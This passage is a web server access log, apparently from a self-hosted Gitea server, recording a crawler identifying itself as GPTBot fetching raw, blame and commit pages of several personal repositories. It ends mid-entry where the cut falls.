200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" -[17/Feb/2026:14:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" -[17/Feb/2026:14:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" -[17/Feb/2026:14:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" -[17/Feb/2026:14:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" -[17/Feb/2026:14:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9462] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" -[17/Feb/2026:14:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" -[17/Feb/2026:14:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" -[17/Feb/2026:14:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 11962] [Gzip 5.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" -[17/Feb/2026:14:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" -[17/Feb/2026:14:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" -[17/Feb/2026:14:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" -[17/Feb/2026:14:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" -[17/Feb/2026:14:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" -[17/Feb/2026:14:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 16073] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:14:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:14:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 16044] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:14:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:14:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12499] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12510] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" -[17/Feb/2026:14:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" -[17/Feb/2026:14:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" -[17/Feb/2026:14:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile?display=source" [Client 74.7.227.38] [Length 11594] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" -[17/Feb/2026:14:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" -[17/Feb/2026:14:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 10142] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" -[17/Feb/2026:14:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" -[17/Feb/2026:14:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 10115] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" -[17/Feb/2026:14:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" -[17/Feb/2026:14:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10192] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10399] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" -[17/Feb/2026:14:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" -[17/Feb/2026:14:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" -[17/Feb/2026:14:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 18783] [Gzip 9.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" -[17/Feb/2026:14:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" -[17/Feb/2026:14:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 12477] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" -[17/Feb/2026:14:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 12478] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" -[17/Feb/2026:14:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 18813] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" -[17/Feb/2026:14:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12272] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 2668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12573] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:14:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" -[17/Feb/2026:14:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10851] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10851] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10849] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10852] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" -[17/Feb/2026:14:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr 